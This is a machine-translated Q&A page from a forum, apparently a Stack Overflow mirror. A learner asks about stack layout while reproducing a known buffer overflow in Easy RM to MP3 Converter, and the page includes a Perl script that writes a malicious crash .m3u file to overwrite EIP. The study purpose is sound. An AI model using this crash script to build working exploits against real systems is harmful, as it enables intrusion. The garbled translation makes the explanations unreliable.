2012-03-22 5 views
0

はいつか戻って、WindowsのXP SP3(http://www.exploit-db.com/exploits/9177/)上のMP3コンバータ2.7.3.700に簡単にRMの悪用に取り組んで、私は理解していないですコンセプトに出くわし、それはこのように書きます:シェルコードの開発、ESPポインタ

悪意のあるファイルを生成する

perlスクリプト:悪意のあるファイルを生成した後

my $junk = "\x41" x 25000; 
my $offset = "\x42" x 1072; 
my $eip = "\x43" x 4; 
my $file = "crash.m3u"; 
open ($file,">$file"); 
print $file $junk.$offset.$eip.$adjustment; 
close ($file); 

を、コンバータにそれを供給し、これらは、なぜそれらは、... [ESP + 18](ESPに対してアドレッシング)でスタックの内容を解析Aはここですか?

I意味:

[ESP-43C]に[ESP-88E8]からAの開始
[ESP-C] [ESP-8]で
C年代に[ESP-438]からBの開始

これらのAは[ESP + 18]から[ESP + 418]に戻っているのはなぜですか?なぜ[ESP + 18E]から[ESP-43C]に配置されたときに、[ESP + 18]〜[ESP + 418]でこれらのAが繰り返されているのですか?

ありがとうございます。

答えて

0

あなたの質問に答えるには、Easy RMでMP3コンバータをデバッグする必要があります。いくつかの以前のブレークポイントを設定してみてください。私は、オーバーフローが直ちに起こっていないと思うし、おそらくそれが静的なバッファを書き込む前に数回コピーされます。 :)

2

これは、バッファに迷惑メールを埋め込むためのもので、残りの1700+バイトは、EIPが上書きされたときにアドレスを取得するためにmetasploitを使用して生成されます。したがって、バッファオーバーフローを引き起こすために必要なバイト数を決定する必要があります。これは、OSとOSが異なるためです。

オプション:そうすることで、必要な箇所にブレークポイントを設定し、EIPアドレスを取得します。

関連する問題